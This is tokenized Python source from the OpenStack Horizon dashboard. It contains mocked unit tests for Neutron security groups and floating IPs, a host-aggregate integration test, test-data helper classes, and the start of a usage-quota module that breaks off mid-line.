<EOL> secgroup = self . api_q_secgroups . first ( ) <EOL> sg_ids = set ( [ secgroup [ '<STR_LIT:id>' ] ] + <EOL> [ rule [ '<STR_LIT>' ] for rule <EOL> in secgroup [ '<STR_LIT>' ] <EOL> if rule [ '<STR_LIT>' ] ] ) <EOL> related_sgs = [ sg for sg in self . api_q_secgroups . list ( ) <EOL> if sg [ '<STR_LIT:id>' ] in sg_ids ] <EOL> self . qclient . show_security_group ( secgroup [ '<STR_LIT:id>' ] ) . AndReturn ( { '<STR_LIT>' : copy . deepcopy ( secgroup ) } ) <EOL> self . qclient . list_security_groups ( id = sg_ids , fields = [ '<STR_LIT:id>' , '<STR_LIT:name>' ] ) . AndReturn ( { '<STR_LIT>' : related_sgs } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . security_group_get ( self . request , secgroup [ '<STR_LIT:id>' ] ) <EOL> self . _cmp_sg ( secgroup , ret ) <EOL> def test_security_group_create ( self ) : <EOL> secgroup = self . api_q_secgroups . list ( ) [ <NUM_LIT:1> ] <EOL> body = { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : secgroup [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : secgroup [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : self . request . user . project_id } } <EOL> self . qclient . create_security_group ( body ) . AndReturn ( { '<STR_LIT>' : copy . deepcopy ( secgroup ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . security_group_create ( self . request , secgroup [ '<STR_LIT:name>' ] , <EOL> secgroup [ '<STR_LIT:description>' ] ) <EOL> self . _cmp_sg ( secgroup , ret ) <EOL> def test_security_group_update ( self ) : <EOL> secgroup = self . api_q_secgroups . list ( ) [ <NUM_LIT:1> ] <EOL> secgroup = copy . deepcopy ( secgroup ) <EOL> secgroup [ '<STR_LIT:name>' ] = '<STR_LIT>' <EOL> secgroup [ '<STR_LIT:description>' ] = '<STR_LIT>' <EOL> body = { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : secgroup [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : secgroup [ '<STR_LIT:description>' ] } } <EOL> self . qclient . update_security_group ( secgroup [ '<STR_LIT:id>' ] , body ) . AndReturn ( { '<STR_LIT>' : secgroup } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . security_group_update ( self . request , <EOL> secgroup [ '<STR_LIT:id>' ] , <EOL> secgroup [ '<STR_LIT:name>' ] , <EOL> secgroup [ '<STR_LIT:description>' ] ) <EOL> self . _cmp_sg ( secgroup , ret ) <EOL> def test_security_group_delete ( self ) : <EOL> secgroup = self . api_q_secgroups . first ( ) <EOL> self . qclient . delete_security_group ( secgroup [ '<STR_LIT:id>' ] ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . security_group_delete ( self . request , secgroup [ '<STR_LIT:id>' ] ) <EOL> def test_security_group_rule_create ( self ) : <EOL> sg_rule = [ r for r in self . api_q_secgroup_rules . list ( ) <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' and r [ '<STR_LIT>' ] ] [ <NUM_LIT:0> ] <EOL> sg_id = sg_rule [ '<STR_LIT>' ] <EOL> secgroup = [ sg for sg in self . api_q_secgroups . list ( ) <EOL> if sg [ '<STR_LIT:id>' ] == sg_id ] [ <NUM_LIT:0> ] <EOL> post_rule = copy . deepcopy ( sg_rule ) <EOL> del post_rule [ '<STR_LIT:id>' ] <EOL> del post_rule [ '<STR_LIT>' ] <EOL> post_body = { '<STR_LIT>' : post_rule } <EOL> self . qclient . create_security_group_rule ( post_body ) . AndReturn ( { '<STR_LIT>' : copy . deepcopy ( sg_rule ) } ) <EOL> self . qclient . list_security_groups ( id = set ( [ sg_id ] ) , <EOL> fields = [ '<STR_LIT:id>' , '<STR_LIT:name>' ] ) . AndReturn ( { '<STR_LIT>' : [ copy . deepcopy ( secgroup ) ] } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . security_group_rule_create ( <EOL> self . request , sg_rule [ '<STR_LIT>' ] , <EOL> sg_rule [ '<STR_LIT>' ] , sg_rule [ '<STR_LIT>' ] , sg_rule [ '<STR_LIT>' ] , <EOL> sg_rule [ '<STR_LIT>' ] , sg_rule [ '<STR_LIT>' ] , <EOL> sg_rule [ '<STR_LIT>' ] , sg_rule [ '<STR_LIT>' ] ) <EOL> self . _cmp_sg_rule ( sg_rule , ret ) <EOL> def test_security_group_rule_delete ( self ) : <EOL> sg_rule = self . api_q_secgroup_rules . first ( ) <EOL> self . qclient . delete_security_group_rule ( sg_rule [ '<STR_LIT:id>' ] ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . security_group_rule_delete ( self . request , sg_rule [ '<STR_LIT:id>' ] ) <EOL> def _get_instance ( self , cur_sg_ids ) : <EOL> instance_port = [ p for p in self . api_ports . list ( ) <EOL> if p [ '<STR_LIT>' ] . startswith ( '<STR_LIT>' ) ] [ <NUM_LIT:0> ] <EOL> instance_id = instance_port [ '<STR_LIT>' ] <EOL> instance_ports = [ ] <EOL> for _i in range ( <NUM_LIT:2> ) : <EOL> p = copy . deepcopy ( instance_port ) <EOL> p [ '<STR_LIT:id>' ] = str ( uuid . uuid4 ( ) ) <EOL> p [ '<STR_LIT>' ] = cur_sg_ids <EOL> instance_ports . append ( p ) <EOL> return ( instance_id , instance_ports ) <EOL> def test_server_security_groups ( self ) : <EOL> cur_sg_ids = [ sg [ '<STR_LIT:id>' ] for sg in self . api_q_secgroups . list ( ) [ : <NUM_LIT:2> ] ] <EOL> instance_id , instance_ports = self . _get_instance ( cur_sg_ids ) <EOL> self . qclient . list_ports ( device_id = instance_id ) . AndReturn ( { '<STR_LIT>' : instance_ports } ) <EOL> secgroups = copy . deepcopy ( self . api_q_secgroups . list ( ) ) <EOL> self . qclient . list_security_groups ( id = set ( cur_sg_ids ) ) . AndReturn ( { '<STR_LIT>' : secgroups } ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . server_security_groups ( self . request , instance_id ) <EOL> def test_server_update_security_groups ( self ) : <EOL> cur_sg_ids = [ self . api_q_secgroups . first ( ) [ '<STR_LIT:id>' ] ] <EOL> new_sg_ids = [ sg [ '<STR_LIT:id>' ] for sg in self . api_q_secgroups . list ( ) [ : <NUM_LIT:2> ] ] <EOL> instance_id , instance_ports = self . _get_instance ( cur_sg_ids ) <EOL> self . qclient . list_ports ( device_id = instance_id ) . AndReturn ( { '<STR_LIT>' : instance_ports } ) <EOL> for p in instance_ports : <EOL> body = { '<STR_LIT:port>' : { '<STR_LIT>' : new_sg_ids } } <EOL> self . qclient . update_port ( p [ '<STR_LIT:id>' ] , body = body ) . AndReturn ( { '<STR_LIT:port>' : p } ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . server_update_security_groups ( <EOL> self . request , instance_id , new_sg_ids ) <EOL> def test_security_group_backend ( self ) : <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> api . network . security_group_backend ( self . request ) ) <EOL> class NetworkApiNeutronFloatingIpTests ( NetworkApiNeutronTestBase ) : <EOL> def setUp ( self ) : <EOL> super ( NetworkApiNeutronFloatingIpTests , self ) . setUp ( ) <EOL> self . qclient . list_extensions ( ) . AndReturn ( { '<STR_LIT>' : self . api_extensions . list ( ) } ) <EOL> @ override_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : True } ) <EOL> def test_floating_ip_supported ( self ) : <EOL> self . mox . ReplayAll ( ) <EOL> self . assertTrue ( api . network . floating_ip_supported ( self . request ) ) <EOL> @ override_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : False } ) <EOL> def test_floating_ip_supported_false ( self ) : <EOL> self . mox . ReplayAll ( ) <EOL> self . assertFalse ( api . network . floating_ip_supported ( self . request ) ) <EOL> def test_floating_ip_pools_list ( self ) : <EOL> search_opts = { '<STR_LIT>' : True } <EOL> ext_nets = [ n for n in self . api_networks . list ( ) <EOL> if n [ '<STR_LIT>' ] ] <EOL> self . qclient . list_networks ( ** search_opts ) . AndReturn ( { '<STR_LIT>' : ext_nets } ) <EOL> self . mox . ReplayAll ( ) <EOL> rets = api . network . floating_ip_pools_list ( self . request ) <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT:name>' ] : <EOL> self . assertEqual ( [ p [ attr ] for p in ext_nets ] , <EOL> [ getattr ( p , attr ) for p in rets ] ) <EOL> def test_floating_ip_list ( self ) : <EOL> fips = self . api_q_floating_ips . list ( ) <EOL> filters = { '<STR_LIT>' : self . request . user . tenant_id } <EOL> self . qclient . list_floatingips ( ** filters ) . AndReturn ( { '<STR_LIT>' : fips } ) <EOL> self . qclient . list_ports ( ** filters ) . AndReturn ( { '<STR_LIT>' : self . api_ports . list ( ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> rets = api . network . tenant_floating_ip_list ( self . request ) <EOL> assoc_port = self . api_ports . list ( ) [ <NUM_LIT:1> ] <EOL> self . assertEqual ( len ( fips ) , len ( rets ) ) <EOL> for ret , exp in zip ( rets , fips ) : <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( exp [ attr ] , getattr ( ret , attr ) ) <EOL> if exp [ '<STR_LIT>' ] : <EOL> dev_id = assoc_port [ '<STR_LIT>' ] if exp [ '<STR_LIT>' ] else None <EOL> self . assertEqual ( dev_id , ret . instance_id ) <EOL> self . assertEqual ( '<STR_LIT>' , ret . instance_type ) <EOL> else : <EOL> self . assertIsNone ( ret . instance_id ) <EOL> self . assertIsNone ( ret . instance_type ) <EOL> def test_floating_ip_list_all_tenants ( self ) : <EOL> fips = self . api_q_floating_ips . list ( ) <EOL> self . qclient . list_floatingips ( ) . AndReturn ( { '<STR_LIT>' : fips } ) <EOL> self . qclient . list_ports ( ) . AndReturn ( { '<STR_LIT>' : self . api_ports . list ( ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . NetworkClient ( self . request ) <EOL> fip_manager = api . neutron . FloatingIpManager ( self . request ) <EOL> rets = fip_manager . list ( all_tenants = True ) <EOL> assoc_port = self . api_ports . list ( ) [ <NUM_LIT:1> ] <EOL> self . assertEqual ( len ( fips ) , len ( rets ) ) <EOL> for ret , exp in zip ( rets , fips ) : <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( getattr ( ret , attr ) , exp [ attr ] ) <EOL> if exp [ '<STR_LIT>' ] : <EOL> dev_id = assoc_port [ '<STR_LIT>' ] if exp [ '<STR_LIT>' ] else None <EOL> self . assertEqual ( dev_id , ret . instance_id ) <EOL> self . assertEqual ( '<STR_LIT>' , ret . instance_type ) <EOL> else : <EOL> self . assertIsNone ( ret . instance_id ) <EOL> self . assertIsNone ( ret . instance_type ) <EOL> def _test_floating_ip_get_associated ( self , assoc_port , exp_instance_type ) : <EOL> fip = self . api_q_floating_ips . list ( ) [ <NUM_LIT:1> ] <EOL> self . qclient . show_floatingip ( fip [ '<STR_LIT:id>' ] ) . AndReturn ( { '<STR_LIT>' : fip } ) <EOL> self . qclient . show_port ( assoc_port [ '<STR_LIT:id>' ] ) . AndReturn ( { '<STR_LIT:port>' : assoc_port } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . tenant_floating_ip_get ( self . request , fip [ '<STR_LIT:id>' ] ) <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( fip [ attr ] , getattr ( ret , attr ) ) <EOL> self . assertEqual ( assoc_port [ '<STR_LIT>' ] , ret . instance_id ) <EOL> self . assertEqual ( exp_instance_type , ret . instance_type ) <EOL> def test_floating_ip_get_associated ( self ) : <EOL> assoc_port = self . api_ports . list ( ) [ <NUM_LIT:1> ] <EOL> self . _test_floating_ip_get_associated ( assoc_port , '<STR_LIT>' ) <EOL> def test_floating_ip_get_associated_with_loadbalancer_vip ( self ) : <EOL> assoc_port = copy . deepcopy ( self . api_ports . list ( ) [ <NUM_LIT:1> ] ) <EOL> assoc_port [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assoc_port [ '<STR_LIT>' ] = str ( uuid . uuid4 ( ) ) <EOL> assoc_port [ '<STR_LIT:name>' ] = '<STR_LIT>' + str ( uuid . uuid4 ( ) ) <EOL> self . _test_floating_ip_get_associated ( assoc_port , '<STR_LIT>' ) <EOL> def test_floating_ip_get_unassociated ( self ) : <EOL> fip = self . api_q_floating_ips . list ( ) [ <NUM_LIT:0> ] <EOL> self . qclient . show_floatingip ( fip [ '<STR_LIT:id>' ] ) . AndReturn ( { '<STR_LIT>' : fip } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . tenant_floating_ip_get ( self . request , fip [ '<STR_LIT:id>' ] ) <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( fip [ attr ] , getattr ( ret , attr ) ) <EOL> self . assertIsNone ( ret . instance_id ) <EOL> self . assertIsNone ( ret . instance_type ) <EOL> def test_floating_ip_allocate ( self ) : <EOL> ext_nets = [ n for n in self . api_networks . list ( ) <EOL> if n [ '<STR_LIT>' ] ] <EOL> ext_net = ext_nets [ <NUM_LIT:0> ] <EOL> fip = self . api_q_floating_ips . first ( ) <EOL> self . qclient . create_floatingip ( <EOL> { '<STR_LIT>' : { '<STR_LIT>' : ext_net [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : self . request . user . project_id } } ) . AndReturn ( { '<STR_LIT>' : fip } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . tenant_floating_ip_allocate ( self . request , <EOL> ext_net [ '<STR_LIT:id>' ] ) <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( fip [ attr ] , getattr ( ret , attr ) ) <EOL> self . assertIsNone ( ret . instance_id ) <EOL> self . assertIsNone ( ret . instance_type ) <EOL> def test_floating_ip_release ( self ) : <EOL> fip = self . api_q_floating_ips . first ( ) <EOL> self . qclient . delete_floatingip ( fip [ '<STR_LIT:id>' ] ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . tenant_floating_ip_release ( self . request , fip [ '<STR_LIT:id>' ] ) <EOL> def test_floating_ip_associate ( self ) : <EOL> fip = self . api_q_floating_ips . list ( ) [ <NUM_LIT:1> ] <EOL> assoc_port = self . api_ports . list ( ) [ <NUM_LIT:1> ] <EOL> ip_address = assoc_port [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> target_id = '<STR_LIT>' % ( assoc_port [ '<STR_LIT:id>' ] , ip_address ) <EOL> params = { '<STR_LIT>' : assoc_port [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : ip_address } <EOL> self . qclient . update_floatingip ( fip [ '<STR_LIT:id>' ] , <EOL> { '<STR_LIT>' : params } ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . floating_ip_associate ( self . request , fip [ '<STR_LIT:id>' ] , target_id ) <EOL> def test_floating_ip_disassociate ( self ) : <EOL> fip = self . api_q_floating_ips . list ( ) [ <NUM_LIT:1> ] <EOL> self . qclient . update_floatingip ( fip [ '<STR_LIT:id>' ] , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : None } } ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . floating_ip_disassociate ( self . request , fip [ '<STR_LIT:id>' ] ) <EOL> def _get_target_id ( self , port ) : <EOL> param = { '<STR_LIT:id>' : port [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : port [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] } <EOL> return '<STR_LIT>' % param <EOL> def _get_target_name ( self , port ) : <EOL> param = { '<STR_LIT>' : port [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : port [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] } <EOL> return '<STR_LIT>' % param <EOL> def _subs_from_port ( self , port ) : <EOL> return [ ip [ '<STR_LIT>' ] for ip in port [ '<STR_LIT>' ] ] <EOL> @ override_settings ( <EOL> OPENSTACK_NEUTRON_NETWORK = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> ) <EOL> def test_floating_ip_target_list ( self ) : <EOL> ports = self . api_ports . list ( ) <EOL> subnet_id = self . subnets . first ( ) . id <EOL> shared_nets = [ n for n in self . api_networks . list ( ) if n [ '<STR_LIT>' ] ] <EOL> shared_subnet_ids = [ s for n in shared_nets for s in n [ '<STR_LIT>' ] ] <EOL> target_ports = [ <EOL> ( self . _get_target_id ( p ) , self . _get_target_name ( p ) ) for p in ports <EOL> if ( not p [ '<STR_LIT>' ] . startswith ( '<STR_LIT>' ) and <EOL> ( subnet_id in self . _subs_from_port ( p ) or <EOL> ( set ( shared_subnet_ids ) & set ( self . _subs_from_port ( p ) ) ) ) ) <EOL> ] <EOL> filters = { '<STR_LIT>' : self . request . user . tenant_id } <EOL> self . qclient . list_ports ( ** filters ) . AndReturn ( { '<STR_LIT>' : ports } ) <EOL> servers = self . servers . list ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . servers = self . mox . CreateMockAnything ( ) <EOL> search_opts = { '<STR_LIT>' : self . request . user . tenant_id } <EOL> novaclient . servers . list ( True , search_opts ) . AndReturn ( servers ) <EOL> search_opts = { '<STR_LIT>' : True } <EOL> ext_nets = [ n for n in self . api_networks . list ( ) <EOL> if n [ '<STR_LIT>' ] ] <EOL> self . qclient . list_networks ( ** search_opts ) . AndReturn ( { '<STR_LIT>' : ext_nets } ) <EOL> self . qclient . list_routers ( ) . AndReturn ( { '<STR_LIT>' : <EOL> self . api_routers . list ( ) } ) <EOL> self . qclient . list_networks ( shared = True ) . AndReturn ( { '<STR_LIT>' : <EOL> shared_nets } ) <EOL> shared_subs = [ s for s in self . api_subnets . list ( ) <EOL> if s [ '<STR_LIT:id>' ] in shared_subnet_ids ] <EOL> self . qclient . list_subnets ( ) . AndReturn ( { '<STR_LIT>' : shared_subs } ) <EOL> self . qclient . list_vips ( ) . AndReturn ( { '<STR_LIT>' : self . vips . list ( ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> rets = api . network . floating_ip_target_list ( self . request ) <EOL> self . assertEqual ( len ( target_ports ) , len ( rets ) ) <EOL> for ret , exp in zip ( rets , target_ports ) : <EOL> self . assertEqual ( exp [ <NUM_LIT:0> ] , ret . id ) <EOL> self . assertEqual ( exp [ <NUM_LIT:1> ] , ret . name ) <EOL> def test_floating_ip_target_get_by_instance ( self ) : <EOL> ports = self . api_ports . list ( ) <EOL> candidates = [ p for p in ports if p [ '<STR_LIT>' ] == '<STR_LIT:1>' ] <EOL> search_opts = { '<STR_LIT>' : '<STR_LIT:1>' } <EOL> self . qclient . list_ports ( ** search_opts ) . AndReturn ( { '<STR_LIT>' : candidates } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . floating_ip_target_get_by_instance ( self . request , '<STR_LIT:1>' ) <EOL> self . assertEqual ( self . _get_target_id ( candidates [ <NUM_LIT:0> ] ) , ret ) <EOL> def test_target_floating_ip_port_by_instance ( self ) : <EOL> ports = self . api_ports . list ( ) <EOL> candidates = [ p for p in ports if p [ '<STR_LIT>' ] == '<STR_LIT:1>' ] <EOL> search_opts = { '<STR_LIT>' : '<STR_LIT:1>' } <EOL> self . qclient . list_ports ( ** search_opts ) . AndReturn ( { '<STR_LIT>' : candidates } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . floating_ip_target_list_by_instance ( self . request , <EOL> '<STR_LIT:1>' ) <EOL> self . assertEqual ( self . _get_target_id ( candidates [ <NUM_LIT:0> ] ) , ret [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( len ( candidates ) , len ( ret ) ) <EOL> def test_floating_ip_target_get_by_instance_with_preloaded_target ( self ) : <EOL> target_list = [ { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . floating_ip_target_get_by_instance ( <EOL> self . request , '<STR_LIT>' , target_list ) <EOL> self . assertEqual ( '<STR_LIT>' , ret ) <EOL> def test_target_floating_ip_port_by_instance_with_preloaded_target ( self ) : <EOL> target_list = [ { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . floating_ip_target_list_by_instance ( <EOL> self . request , '<STR_LIT>' , target_list ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , ret ) </s>
<s> from openstack_dashboard . test . integration_tests import helpers <EOL> from openstack_dashboard . test . integration_tests . regions import messages <EOL> class TestHostAggregates ( helpers . AdminTestCase ) : <EOL> HOST_AGGREGATE_NAME = helpers . gen_random_resource_name ( "<STR_LIT>" ) <EOL> HOST_AGGREGATE_AVAILABILITY_ZONE = "<STR_LIT>" <EOL> def test_host_aggregate_create ( self ) : <EOL> """<STR_LIT>""" <EOL> hostaggregates_page = self . home_pg . go_to_system_hostaggregatespage ( ) <EOL> hostaggregates_page . create_host_aggregate ( <EOL> name = self . HOST_AGGREGATE_NAME , <EOL> availability_zone = self . HOST_AGGREGATE_AVAILABILITY_ZONE ) <EOL> self . assertTrue ( <EOL> hostaggregates_page . find_message_and_dismiss ( messages . SUCCESS ) ) <EOL> self . assertFalse ( hostaggregates_page . find_message_and_dismiss ( <EOL> messages . ERROR ) ) <EOL> self . assertTrue ( hostaggregates_page . is_host_aggregate_present ( <EOL> self . HOST_AGGREGATE_NAME ) ) <EOL> hostaggregates_page . delete_host_aggregate ( self . HOST_AGGREGATE_NAME ) <EOL> self . assertTrue ( <EOL> hostaggregates_page . find_message_and_dismiss ( messages . SUCCESS ) ) <EOL> self . assertFalse ( hostaggregates_page . find_message_and_dismiss ( <EOL> messages . ERROR ) ) <EOL> self . assertFalse ( hostaggregates_page . is_host_aggregate_present ( <EOL> self . HOST_AGGREGATE_NAME ) ) </s>
<s> def load_test_data ( load_onto = None ) : <EOL> from openstack_dashboard . test . test_data import ceilometer_data <EOL> from openstack_dashboard . test . test_data import cinder_data <EOL> from openstack_dashboard . test . test_data import exceptions <EOL> from openstack_dashboard . test . test_data import glance_data <EOL> from openstack_dashboard . test . test_data import heat_data <EOL> from openstack_dashboard . test . test_data import keystone_data <EOL> from openstack_dashboard . test . test_data import neutron_data <EOL> from openstack_dashboard . test . test_data import nova_data <EOL> from openstack_dashboard . test . test_data import swift_data <EOL> loaders = ( <EOL> exceptions . data , <EOL> keystone_data . data , <EOL> glance_data . data , <EOL> nova_data . data , <EOL> cinder_data . data , <EOL> neutron_data . data , <EOL> swift_data . data , <EOL> heat_data . data , <EOL> ceilometer_data . data , <EOL> ) <EOL> if load_onto : <EOL> for data_func in loaders : <EOL> data_func ( load_onto ) <EOL> return load_onto <EOL> else : <EOL> return TestData ( * loaders ) <EOL> class TestData ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args ) : <EOL> for data_func in args : <EOL> data_func ( self ) <EOL> class TestDataContainer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _objects = [ ] <EOL> def add ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> for obj in args : <EOL> if obj not in self . _objects : <EOL> self . _objects . append ( obj ) <EOL> def list ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _objects <EOL> def filter ( self , filtered = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if filtered is None : <EOL> filtered = self . _objects <EOL> try : <EOL> key , value = kwargs . popitem ( ) <EOL> except KeyError : <EOL> return filtered <EOL> def get_match ( obj ) : <EOL> return hasattr ( obj , key ) and getattr ( obj , key ) == value <EOL> filtered = [ obj for obj in filtered if get_match ( obj ) ] <EOL> return self . filter ( filtered = filtered , ** kwargs ) <EOL> def get ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> matches = self . filter ( ** kwargs ) <EOL> if not matches : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> elif len ( matches ) > <NUM_LIT:1> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> return matches . pop ( ) <EOL> def first ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _objects [ <NUM_LIT:0> ] <EOL> def count ( self ) : <EOL> return len ( self . _objects ) </s>
<s> from __future__ import division <EOL> import datetime <EOL> from django . utils import timezone <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon import messages <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . usage import quotas <EOL> class BaseUsage ( object ) : <EOL> show_deleted = False <EOL> def __init__ ( self , request , project_id = None ) : <EOL> self . project_id = project_id or request . user . tenant_id <EOL> self . request = request <EOL> self . summary = { } <EOL> self . usage_list = [ ] <EOL> self . limits = { } <EOL> self . quotas = { } <EOL> @ property <EOL> def today ( self ) : <EOL> return timezone . now ( ) <EOL> @ staticmethod <EOL> def get_start ( year , month , day ) : <EOL> start = datetime . datetime ( year , month , day , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> return timezone . make_aware ( start , timezone . utc ) <EOL> @ staticmethod <EOL> def get_end ( year , month , day ) : <EOL> end = datetime . datetime ( year , month , day , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> return timezone . make_aware ( end , timezone . utc ) <EOL> def get_instances ( self ) : <EOL> instance_list = [ ] <EOL> [ instance_list . extend ( u . server_usages ) for u in self . usage_list ] <EOL> return instance_list <EOL> def get_date_range ( self ) : <EOL> if not hasattr ( self , "<STR_LIT:start>" ) or not hasattr ( self , "<STR_LIT:end>" ) : <EOL> args_start = ( self . today . year , self . today . month , <NUM_LIT:1> ) <EOL> args_end = ( self . today . year , self . today . month , self . today . day ) <EOL> form = self . get_form ( ) <EOL> if form . is_valid ( ) : <EOL> start = form . cleaned_data [ '<STR_LIT:start>' ] <EOL> end = form . cleaned_data [ '<STR_LIT:end>' ] <EOL> args_start = ( start . year , <EOL> start . month , <EOL> start . day ) <EOL> args_end = ( end . year , <EOL> end . month , <EOL> end . day ) <EOL> elif form . is_bound : <EOL> messages . error ( self . request , <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> self . start = self . get_start ( * args_start ) <EOL> self . end = self . get_end ( * args_end ) <EOL> return self . start , self . end <EOL> def init_form ( self ) : <EOL> today = datetime . date . today ( ) <EOL> self . start = datetime . date ( day = <NUM_LIT:1> , month = today . month , year = today . year ) <EOL> self . end = today <EOL> return self . start , self . end <EOL> def get_form ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> req = self . request <EOL> start = req . GET . get ( '<STR_LIT:start>' , req . session . get ( '<STR_LIT>' ) ) <EOL> end = req . GET . get ( '<STR_LIT:end>' , req . session . get ( '<STR_LIT>' ) ) <EOL> if start and end : <EOL> self . form = forms . DateForm ( { '<STR_LIT:start>' : start , '<STR_LIT:end>' : end } ) <EOL> else : <EOL> init = self . init_form ( ) <EOL> start = init [ <NUM_LIT:0> ] . isoformat ( ) <EOL> end = init [ <NUM_LIT:1> ] . isoformat ( ) <EOL> self . form = forms . DateForm ( initial = { '<STR_LIT:start>' : start , <EOL> '<STR_LIT:end>' : end } ) <EOL> req . session [ '<STR_LIT>' ] = start <EOL> req . session [ '<STR_LIT>' ] = end <EOL> return self . form <EOL> def _get_neutron_usage ( self , limits , resource_name ) : <EOL> resource_map = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : api . network . tenant_floating_ip_list , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:message>' : _ ( '<STR_LIT>' ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : api . network . security_group_list , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:message>' : _ ( '<STR_LIT>' ) <EOL> } <EOL> } <EOL> resource = resource_map [ resource_name ] <EOL> try : <EOL> method = resource [ '<STR_LIT>' ] <EOL> current_used = len ( method ( self . request ) ) <EOL> except Exception : <EOL> current_used = <NUM_LIT:0> <EOL> msg = resource [ '<STR_LIT:message>' ] <EOL> exceptions . handle ( self . request , msg ) <EOL> limits [ resource [ '<STR_LIT>' ] ] = current_used <EOL> def _set_neutron_limit ( self , limits , neutron_quotas , resource_name ) : <EOL> limit_name_map = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if neutron_quotas is None : <EOL> resource_max = float ( "<STR_LIT>" ) <EOL> else : <EOL> resource_max = 